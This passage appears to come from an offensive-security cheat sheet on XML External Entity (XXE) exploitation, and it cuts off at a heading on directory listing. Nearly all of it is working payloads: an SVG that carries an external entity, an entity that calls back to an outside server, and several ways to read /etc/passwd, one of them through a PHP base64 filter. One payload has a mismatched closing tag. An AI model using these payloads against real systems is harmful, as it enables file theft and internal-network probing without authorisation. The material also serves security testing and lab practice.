How to exploit XML External Entities (XXE). This allows a remote attacker to read files off of the filesystem, make HTTP requests to internal services/applications, and read the responses.
XXE with SVG
Because SVG is XML, it can also have XXEs:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" [
<!-- an internal subset can be embedded here -->
<!ENTITY xxe SYSTEM "https://example.com/foo.txt">
]>
<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<text x="20" y="35">My &xxe;</text>
</svg>
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://server/pixel?callback_token=ee34a1791ab345f789">
]>
<r>&sp;</r>
Read file
Lets try to read /etc/passwd in different ways. For Windows you could try to read: C:\windows\system32\drivers\etc\hosts
In this first case notice that SYSTEM "**file:///**etc/passwd" will also work.
<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&example;</data>
This second case should be useful to extract a file if the web server is using PHP (Not the case of Portswiggers labs)
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> ]>
<data>&example;</data>
In this third case notice we are declaring the Element stockCheck as ANY
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ELEMENT stockCheck ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<stockCheck>
<productId>&file;</productId>
<storeId>1</storeId>
</stockCheck3>
Directory listing
In Java based applications it might be possible to list the contents of a directory via XXE with a payload like (just asking for the directory instead of the file):
